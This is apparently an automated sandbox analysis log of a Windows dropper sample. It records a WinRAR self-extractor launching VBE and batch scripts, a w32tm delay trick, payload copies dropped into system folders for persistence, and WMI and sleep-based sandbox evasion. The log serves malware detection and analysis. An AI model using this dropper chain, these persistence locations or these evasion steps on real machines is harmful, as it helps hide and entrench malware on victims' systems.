                          Source: vscBin6hqM.13.dr, UrxRiHr1XE.13.dr, kO4bdXkONn.13.dr, pKV2TyFH9r.13.dr, lp3W65fjAl.13.dr, SlQQOUQ4YI.13.dr, jn8ZLrXO2y.13.dr, 7bWcWNF7kN.13.dr, OXnaIwaap4.13.dr, E7QyLMMMgO.13.dr, Lgf7mHanUj.13.dr, 7cRdzGnwM4.13.dr, 0xAgFwENCH.13.dr, Xymen1sgcp.13.dr, HSZ8zIATHv.13.dr, yxECZfxPPk.13.dr, nm2hyEJxLc.13.dr, Btlz2DKLK4.13.dr, aeUm86pc1E.13.dr, ynlhtOMkLj.13.dr, 6NeD6uzSrZ.13.dr, LHHB1t8AXe.13.dr, ayDFRodWcn.13.dr, WGQcNUm87S.13.dr, 7wnmzew4uT.13.dr, MXqrl4I1Rh.13.dr, IpCFBQp7Hn.13.dr, m21rsQ6lPt.13.dr, Jov5bgW2Mu.13.dr, ABTr0UF6Fl.13.dr, OYhv9v4nv7.13.dr, Rcpv6qDZFo.13.dr, IsH2sqAW5J.13.dr, wJ6I7RGTOP.13.dr, rpYtetqegq.13.dr, v88wvUdyVd.13.dr, xH7x5ubjFw.13.dr, VXqWsEBRgR.13.dr, UxCGjIscaZ.13.dr, YX9a1xbTqG.13.dr, lkW7BlCJN1.13.dr, ogPt8ZHFOO.13.dr, oMOZV4CgKG.13.dr, IkVR5JvxTE.13.dr, 0ihKRVV5nh.13.dr, GlX3F3zFgc.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: CJF0Ri1HrG.exe | ReversingLabs: Detection: 57%
Source: CJF0Ri1HrG.exe | Virustotal: Detection: 49%
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | File read: C:\Users\user\Desktop\CJF0Ri1HrG.exe
Source: unknown | Process created: C:\Users\user\Desktop\CJF0Ri1HrG.exe C:\Users\user\Desktop\CJF0Ri1HrG.exe
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exe
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe "C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe"
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: CJF0Ri1HrG.exe | Static file information: File size 2730343 > 1048576
Source: CJF0Ri1HrG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CJF0Ri1HrG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CJF0Ri1HrG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CJF0Ri1HrG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CJF0Ri1HrG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CJF0Ri1HrG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: CJF0Ri1HrG.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CJF0Ri1HrG.exe
Source: Binary string: 7..pDb source: hyperbrokerhostNetsvc.exe, 00000005.00000002.1940161275.00007FFD9C150000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: <".pDB source: CJF0Ri1HrG.exe
Source: CJF0Ri1HrG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CJF0Ri1HrG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CJF0Ri1HrG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CJF0Ri1HrG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CJF0Ri1HrG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | File created: C:\PortCommon\__tmp_rar_sfx_access_check_6395125
Source: CJF0Ri1HrG.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Code function: 0_2_0037F640 push ecx; ret 0_2_0037F653
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Code function: 0_2_0037EB78 push eax; ret 0_2_0037EB96
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Code function: 5_2_00007FFD9BAA4861 push ebx; iretd 5_2_00007FFD9BAA4864
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BAB2B9C push E8FFFFFFh; retf 13_2_00007FFD9BAB2BA1
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BAF7C4D pushfd ; ret 13_2_00007FFD9BAF7C50
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BAC79A8 push edx; ret 13_2_00007FFD9BAC79BB
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BAC44AF pushad ; iretd 13_2_00007FFD9BAC44B0
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BAC44A8 pushad ; iretd 13_2_00007FFD9BAC44A9
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BAA4C56 pushad ; retf 13_2_00007FFD9BAA4C57
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BAA4861 push ebx; iretd 13_2_00007FFD9BAA4864
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BC9B428 push E8FFFFFFh; retf 13_2_00007FFD9BC9B431
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9BC77996 pushad ; ret 13_2_00007FFD9BC779A9
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9C172966 push ebx; retf 13_2_00007FFD9C172967
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9C16A3AD push E95DDA8Bh; ret 13_2_00007FFD9C16A3C9
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 13_2_00007FFD9C29451C push E8FFFFFFh; ret 13_2_00007FFD9C294521
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\EsydEbLs.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\avRZftgA.log
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\RUhcZACY.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\nxxgerdx.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\AFgebewE.log
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\vJfNUyGL.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\KxrkaJNA.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\EMydcNjR.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\OnibhGNt.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\GHBtTNNH.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\Public\TextInputHost.exe
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\ylcWNDYf.log
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\RMxJvRbT.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\pzkPzahs.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\dOeQuOYP.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\hWbZPhSL.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\WixjfVXd.log
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | File created: C:\PortCommon\hyperbrokerhostNetsvc.exe
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\pRCorSBW.log
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\CHTNxNAz.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\XWBrRjTb.log
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | File created: C:\Users\user\Desktop\sYzxNlvS.log
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\jHHpWudE.log
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\dxDIAclw.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\Help\mui\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\kekpPWli.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\PgdUomGa.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\QpUJDpSo.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\aMYstPaD.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\tqaFGXil.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\CbsTemp\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\TOksRAfO.logJump to dropped file

                          Boot Survival

                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\Public\TextInputHost.exe
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Memory allocated: D40000 memory reserve | memory write watch
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Memory allocated: 1ACA0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe Memory allocated: 8A0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe Memory allocated: 1A6A0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe Code function: 13_2_00007FFD9C29BBE4 sldt word ptr [eax] 13_2_00007FFD9C29BBE4
                          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe Window / User API: threadDelayed 5926
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe Window / User API: threadDelayed 2819
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_0-23429
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -592239s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -591875s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -591484s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -591047s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -590913s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -590625s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -590313s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -589969s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -589729s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -589422s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -589047s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -588704s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -588438s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -588151s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -588016s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587895s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587781s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587665s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587563s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587438s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587313s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587200s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0036A69B
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0037C220
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037E6A3 VirtualQuery,GetSystemInfo,0_2_0037E6A3
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 3600000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598672Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598500Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598141Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597141Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597010Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 596500Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 596016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595844Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595516Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 594469Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 594016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593813Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593610Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 300000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593204Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592829Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592579Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592239Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591875Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591484Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591047Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590913Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590625Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590313Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589969Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589729Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589422Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589047Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588704Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588438Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588151Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587895Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587781Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587665Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587563Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587438Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587313Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587200Jump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
